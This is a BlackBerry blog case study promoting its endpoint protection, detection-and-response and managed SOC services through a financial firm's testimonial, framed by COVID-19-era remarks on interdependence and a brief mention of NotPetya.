Skip Navigation
BlackBerry ThreatVector Blog

Case Study: Overselling Self-Reliance - What We Owe Each Other In A Connected World

Author’s Note: BlackBerry completed its acquisition of Cylance on February 21, 2019, and is currently selling the CylancePROTECT®, CylanceOPTICS®, and CylanceGUARD® solutions under the newly rebranded names BlackBerry® Protect, BlackBerry® Optics, and BlackBerry® Guard. All references to the Cylance organization and its branded products and services in this case study utilize BlackBerry branding.

If nothing else, the COVID-19 crisis has demonstrated the pitfalls of believing we are islands entire of ourselves, to paraphrase a line from John Donne’s Meditation XVII. The illusion that self-reliance alone governs our lives is unsustainable in a world where hospital workers in New York City depend on protective gear made in China to avoid infection, and rural farmers plow under their crops because restaurants in urban centers have shut down.

Our essential interconnectedness shows up just as strongly in the realm of cybersecurity. In 2017, a Russian threat group launched an attack on Ukraine by planting NotPetya malware in an update to a popular accounting package. Before it was finally vanquished, NotPetya would infect tens of thousands of computers across the globe, causing widespread damage and knocking 20% of the world’s shipping capacity offline in a matter of hours. In a connected world, malware doesn’t respect national boundaries.

Of course, mutual dependence doesn’t absolve us of our personal obligations to act responsibly. As individuals and organizations, it’s still incumbent upon us to practice good cyber hygiene, patch vulnerable systems, and implement security controls that protect data privacy and integrity. Consider the example of BlackBerry customer Prospect Capital Management (PCM).

Prospect Capital Management Sets Its Sights on Prevention

In early 2017, CTO Al Faella and CISO Steven Elliott had lost confidence in the efficacy of the firm’s legacy endpoint defenses. “Prospect’s mission is to generate long-term value for our portfolio companies, private equity sponsors, and investors,” says Faella. “This begins with ensuring that the sensitive client, partner, and investment data our analysts rely upon to conduct business is never exposed, ransomed, or stolen by cybercriminals.”

The team invited BlackBerry and three other firms to participate in a Proof of Concept (POC) evaluation of next-gen endpoint protection products. After intensive testing, they selected BlackBerry® Protect. “Since then, we’ve had no reason to second-guess our decision to partner with BlackBerry,” says Faella. “In the three years since we deployed BlackBerry Protect, we’ve experienced a total of zero infections while maintaining a 100% protection rate.”

Seeking Help Is Sound Business and Security Strategy

Threat groups are increasingly utilizing stolen credentials, rather than malware, to achieve their actions on objectives. Therefore, resilient organizations complement their endpoint protection controls with endpoint detection and response (EDR) solutions to stop living-off-the-land attacks. Once again, the Prospect team stepped up to the challenge.

“We’ve never been breached, but it would be irresponsible to assume it could never happen,” says Faella. He and Elliott evaluated several EDR solutions before selecting BlackBerry® Optics. “We concluded that BlackBerry Optics had the most flexible detection and response framework, which would allow us to fine-tune its detection rules to minimize false positives,” says Faella. “We also knew it takes considerable expertise to effectively implement and manage an EDR solution, so we were intrigued when we learned about BlackBerry® Guard.”

Adds Elliott, “Now, in addition to industry-leading security controls, we were being offered a Security Operations Center (SOC) to monitor our environment, triage alerts, hunt for threats, and keep us informed about potential attacks. It was the perfect fit for our needs.”

The Prospect team was wise to accept the help being offered. The BlackBerry Guard onboarding concluded a scant three days before New York Governor Andrew Mark Cuomo issued a March 20th executive order closing the physical offices of all non-essential businesses. Recognizing an opportunity to exploit the crisis, cyber-criminals quickly launched a series of massive spam and phishing campaigns.

“Thanks to BlackBerry Guard, we weren’t affected,” says Elliott. “And with the BlackBerry SOC team watching our backs, we’re confident our employees can work from home both safely and securely.”

Read the full case study here.

 

Eric Milam

About Eric Milam

VP of Research Operations, Blackberry

Eric Milam is the VP of Research Operations at Blackberry where he and his team track malware threats and threat actors. During his time at Blackberry, he discovered and published the details of numerous emerging threats and malware variants actively being exploited in the wild.

Prior to joining Blackberry, Eric was a highly regarded Penetration Tester and frequent conference speaker, widely known for his red-teaming exploits.